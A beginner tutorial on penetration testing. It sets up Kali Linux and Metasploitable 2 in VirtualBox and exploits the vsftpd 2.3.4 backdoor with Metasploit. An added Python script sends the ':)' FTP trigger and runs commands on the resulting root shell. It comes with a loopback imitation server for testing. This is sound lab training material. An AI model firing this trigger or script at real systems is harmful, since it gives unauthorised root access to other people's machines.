Getting Started with Penetration Testing using Metasploit

Contents

Anurag Kulkarni
6 min read · Jan 2, 2022
  1. What is Penetration Testing?
  2. Stages of Penetration Testing
  3. Methods of Penetration Testing
  4. Introduction to VirtualBox
  5. Introduction to Kali Linux
  6. Introduction to Metasploitable

What is Penetration Testing?

Penetration Testing is also known as Pen Testing or Ethical Hacking. A pen test is an authorised, simulated cyber attack carried out by a security expert to find and exploit vulnerabilities in a computer system. It is performed to discover the weak points in a system’s defences before real attackers can take advantage of them.

Stages of Penetration Testing

  1. Planning and Reconnaissance:-
  • Define the scope, goals and rules of engagement of the test: which systems may be touched, and how.
  • Gather the information about the target system that is needed to understand how it works and where it might be vulnerable (domains, IP ranges, exposed services, technologies in use).

2. Scanning:-

  • This step is about understanding how the target system will respond to intrusion attempts.
  • The application’s code can be examined (static analysis) to estimate how it will react to manipulation, or the running application can be probed (dynamic analysis), for example by scanning its open ports and services.

3. Gaining Access:-

  • This step uncovers the target’s vulnerabilities and exploits them. Attacks such as using a backdoor or Cross-site Scripting can be performed to gain access to the target system.
  • The tester then pushes further by escalating privileges, stealing data and intercepting traffic, to measure the damage a real attacker could cause.

4. Maintaining Access:-

  • This step checks whether the vulnerability can be used to gain persistent access to the target system.
  • This imitates advanced persistent threats, which often stay in a compromised system for months.

5. Analysis:-

  • This step produces a report of all the vulnerabilities found in the target system, the data that was exposed, and how long the tester was able to keep control of the system undetected.

Methods of Penetration Testing

  1. External Testing:-
  • This method targets the assets which are reachable from the internet.
  • Example: websites, e-mail servers, DNS servers, etc.

2. Internal Testing:-

  • In this method the tester is given access to an application behind the firewall, simulating an attack by a malicious insider or by an attacker who has already stolen an employee’s credentials.

3. Blind Testing:-

  • In this method the tester is given only the name of the target organisation by the security personnel.
  • This gives an idea of how a real attack, starting from public information alone, would unfold.

4. Double-blind Testing:-

  • In this method the organisation’s security personnel are not told that the test is taking place.
  • This simulates a real-world attack and also tests how well the defenders detect and respond to it.

5. Targeted Testing:-

  • In this method the tester and the security personnel work together and keep each other updated about their movements, which is useful for training and for checking that the defenders see what the tester is doing.

Introduction to Oracle VirtualBox

  • Oracle VirtualBox is a free, general-purpose virtualisation tool that lets us run multiple operating systems as virtual machines on our local machine.
  • Download and install Oracle VirtualBox for your host operating system and hardware.

Introduction to Kali Linux

  • Kali Linux is an open-source, Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing.
  • It ships with over 600 tools for Penetration Testing and Security Analysis.
  • Download the pre-built Kali Linux image for Oracle VirtualBox (an “.ova” appliance file) rather than the installer ISO, so that no operating system installation is needed.

Installing Kali Linux on VirtualBox

Step 1:

  • Open VirtualBox.
  • On a fresh install the VM list on the left will be empty.

Step 2:

  • Click on the “Import” button.
  • From source select “Local File System” and then in the Files section choose the Kali Linux “.ova” file you just downloaded.

Step 3:

  • You will be shown an Appliance Settings page; leave the settings at their defaults.
  • Click “Import”.
  • You will get a Software Licence Agreement page, click “Agree”.
  • Wait till the importing is done.

Step 4:

  • Once the importing is finished, you will see a Kali Linux VM in the VM list.
  • Right click it and go to Settings.
  • Go to the “Network” tab.
  • In the “Attached to” section select Host-only Adapter. This keeps the VM off your real local network and off the internet; it is reachable only from the host and from other VMs on the same host-only network. Note the name of the host-only network shown in the “Name” field (for example vboxnet0 on Linux), because the Metasploitable VM must be attached to the same one for the two VMs to talk to each other.
  • Click “OK”.

Step 5:

  • Go ahead and Double Click on the Kali Linux VM to boot into it.
  • The login ID and the password are both “kali” (the default for the official Kali images; change it if the VM will ever be used outside this isolated lab).

Introduction to Metasploitable

  • Metasploitable is a deliberately vulnerable Linux virtual machine built for security training (Metasploitable 2 is based on Ubuntu 8.04).
  • With Metasploitable, attacks can be practised legally on a machine you own instead of on somebody else’s system. Because it is full of known holes, it must never be attached to a network other people can reach.
  • Download Metasploitable.

Installing Metasploitable on VirtualBox

Step 1:

  • Open VirtualBox.

Step 2:

  • Click on New.
  • Name the VM as Metasploitable2.
  • Select the Type as Linux.
  • Select the Version as Ubuntu (32-bit), since Metasploitable 2 is a 32-bit Ubuntu 8.04 image (the Ubuntu (64-bit) profile boots it as well).

Step 3:

  • Select “Use an existing virtual hard disk file” and choose the Metasploitable disk image (the “.vmdk” file inside the zip archive you just downloaded; extract the archive first).

Step 4:

  • Right click on the VM you just created and go to Settings.
  • Go to the Network section.
  • In the “Attached to” section select “Host-only Adapter”, and pick the same host-only network that the Kali VM uses. This keeps the deliberately vulnerable machine off your local network while still letting Kali reach it.
  • Click “Ok”.

Step 5:

  • Double click on the VM you just created.
  • The first boot takes a while.
  • The login ID and the password are both “msfadmin”.

Preparing Metasploitable

Step 1:

  • Type in the command “ifconfig” to get the IP address of the Metasploitable machine.
  • Metasploitable’s older ifconfig prints the address of the eth0 interface as “inet addr:” (for example “inet addr:192.168.56.101”); note it down. It should lie in the range of the host-only network you chose.

Step 2:

  • Create a file using the command “touch test.txt”.
  • Let’s write a message in that file; we will read it back later from the shell we obtain, to confirm that the shell really runs on the Metasploitable machine.
  • Enter the command “nano test.txt”.
  • Write some message, for example: “This file has been written in Metasploitable”.
  • Press “Ctrl + X” to exit.
  • Type in “y” to save the modified buffer and then press Enter.

Introduction to Metasploit

  • Metasploit is a Ruby-based penetration testing framework.
  • It contains tools for testing security vulnerabilities, enumerating networks, executing attacks and evading detection.
  • It provides an environment for penetration testing and exploit development, and it comes pre-installed on Kali Linux.

Getting to know the Attack

  • vsftpd (“Very Secure FTP Daemon”) is a widely used FTP server on Unix-like systems and on Linux distributions such as Ubuntu, CentOS and Fedora.
  • In June 2011 the vsftpd 2.3.4 source archive on the project’s master download site was replaced with a tampered copy containing a backdoor: when a client logs in with a username containing the characters “:)”, the daemon opens a command shell, running as root, on TCP port 6200 that requires no authentication at all. The tampering was noticed within days and the clean archive restored, but Metasploitable 2 deliberately runs the backdoored build on port 21.
  • We are going to use this backdoor to make a “Backdoor Entry” into the Metasploitable machine.

Getting Started with the Attack

Step 1:

  • Go ahead and open a Terminal window in your Kali Linux VM.
  • Type in command “msfconsole” to run the Metasploit Framework.

Step 2:

  • To find the module, enter the command “search vsftpd”; the result lists the module path and its rank.
  • To load the exploit, type “use exploit/unix/ftp/vsftpd_234_backdoor” (the module lives under unix/ftp/).

Step 3:

  • Enter the “show options” command to check the module’s settings. RPORT defaults to 21, which is where Metasploitable’s FTP server listens.
  • We have to point RHOSTS at our victim machine, which is the Metasploitable VM.
  • Enter the command “set RHOSTS <ip address>” with the IP address you noted down from Metasploitable. (Older write-ups use “set RHOST”; current Metasploit accepts it as an alias of RHOSTS.)

Step 4:

  • Enter “exploit” (or “run”) to start the attack.
  • Metasploit sends the “:)” trigger over FTP, connects to port 6200 and hands you a command shell on the Metasploitable machine. The shell has no prompt; type “id” to see that it runs as root, and “cat /home/msfadmin/test.txt” to read back the file written earlier and confirm which machine you are on.
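What the module does on the wire can be reproduced by hand, which makes clear why there is nothing to “crack” here: the trigger is just a login name, and afterwards the shell is simply listening. The Python below is an added example written for this post; it is not code from the article or from the Metasploit module. It assumes, from the public 2011 reports, that a username containing “:)” makes the tampered daemon start a root shell on TCP 6200. FakeVsftpd is a constructed loopback imitation of that behaviour so the checker can be tried without Metasploitable; check_backdoor() should only be pointed at machines you are authorised to test (in the lab, the Metasploitable IP on port 21).

```python
"""Hand-rolled check for the vsftpd 2.3.4 backdoor, with an offline stand-in.

Added example for this post, not code from the article or from Metasploit.
Assumed (public 2011 reports): a username containing ":)" makes the tampered
daemon listen with /bin/sh on TCP 6200.  FakeVsftpd is a constructed loopback
imitation of that behaviour.  Only run check_backdoor() against hosts you own.
"""
import socket
import socketserver
import threading
from typing import Optional

SHELL_PORT = 6200                    # where the real backdoor's shell listens


def build_trigger(user: str = "probe") -> bytes:
    """FTP login lines whose username carries the backdoor trigger ':)'."""
    return f"USER {user}:)\r\nPASS ignored\r\n".encode()


def run_shell_command(host: str, port: int, cmd: str,
                      timeout: float = 3.0) -> Optional[str]:
    """Talk to the bare shell on `port`; None if nothing is listening."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sh:
            sh.sendall(cmd.encode() + b"\n")
            return sh.recv(4096).decode(errors="replace").strip() or None
    except OSError:                  # refused, unreachable or timed out
        return None


def check_backdoor(host: str, ftp_port: int = 21, shell_port: int = SHELL_PORT,
                   timeout: float = 3.0) -> Optional[str]:
    """Send the trigger over FTP, then ask the shell port for `id`.

    Returns the `id` output (root on a backdoored host), or None when the
    shell port stays closed, i.e. the server is not the tampered build.
    """
    with socket.create_connection((host, ftp_port), timeout=timeout) as ftp:
        ftp.recv(1024)               # 220 banner
        ftp.sendall(build_trigger())
        try:                         # the real tampered daemon never answers
            ftp.recv(1024)           # this login; a clean one replies 331/530
        except socket.timeout:
            pass
    return run_shell_command(host, shell_port, "id", timeout)


# ---- constructed stand-in for a backdoored vsftpd 2.3.4 (loopback only) ----

class _FakeShell(socketserver.StreamRequestHandler):
    """Imitates the backdoor's /bin/sh: no prompt, answers as root."""
    def handle(self):
        cmd = self.rfile.readline().decode(errors="replace").strip()
        if cmd == "id":
            self.wfile.write(b"uid=0(root) gid=0(root)\n")
        else:
            self.wfile.write(f"sh: {cmd}: not found\n".encode())


class _FakeFtp(socketserver.StreamRequestHandler):
    """Minimal FTP front end: a ':)' in USER opens the shell listener."""
    def handle(self):
        self.wfile.write(b"220 (vsFTPd 2.3.4)\r\n")
        line = self.rfile.readline().decode(errors="replace")
        if line.upper().startswith("USER ") and ":)" in line:
            self.server.open_shell()  # attribute set by FakeVsftpd below
            return                    # real daemon hangs here; we just close
        self.wfile.write(b"331 Please specify the password.\r\n")


class FakeVsftpd:
    """Serves fake FTP on an ephemeral port; the shell port opens on trigger."""
    def __init__(self, host: str = "127.0.0.1"):
        self.ftp = socketserver.ThreadingTCPServer((host, 0), _FakeFtp)
        self.ftp.open_shell = self._open_shell
        # Reserve the shell port now but do not listen() until the trigger
        # arrives, so "closed before, open after" is observable as on a target.
        self.shell = socketserver.ThreadingTCPServer((host, 0), _FakeShell,
                                                     bind_and_activate=False)
        self.shell.server_bind()
        self.ftp_port = self.ftp.server_address[1]
        self.shell_port = self.shell.server_address[1]
        self.triggered = False
        threading.Thread(target=self.ftp.serve_forever, daemon=True).start()

    def _open_shell(self):
        if not self.triggered:
            self.triggered = True
            self.shell.server_activate()        # listen() happens only now
            threading.Thread(target=self.shell.serve_forever, daemon=True).start()

    def close(self):
        self.ftp.shutdown()
        self.ftp.server_close()
        if self.triggered:
            self.shell.shutdown()
        self.shell.server_close()


if __name__ == "__main__":
    target = FakeVsftpd()
    try:
        print("before trigger:", run_shell_command("127.0.0.1", target.shell_port, "id"))
        print("after trigger: ", check_backdoor("127.0.0.1", target.ftp_port, target.shell_port))
    finally:
        target.close()
```

Running the file directly starts the stand-in, shows the shell port refusing connections, sends the trigger and prints the `id` output from the shell that has just opened. Against the lab VM, call check_backdoor("<Metasploitable IP>") with the default ports and expect “uid=0(root) gid=0(root)”; a clean vsftpd answers the login normally and leaves port 6200 closed, so the function returns None.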

Conclusion

We have seen what penetration testing is, along with its stages and methods. We also got familiar with Oracle VirtualBox and installed two VMs on it, isolated together on a host-only network. Finally, we practised a simple backdoor-entry attack against Metasploitable using Metasploit.
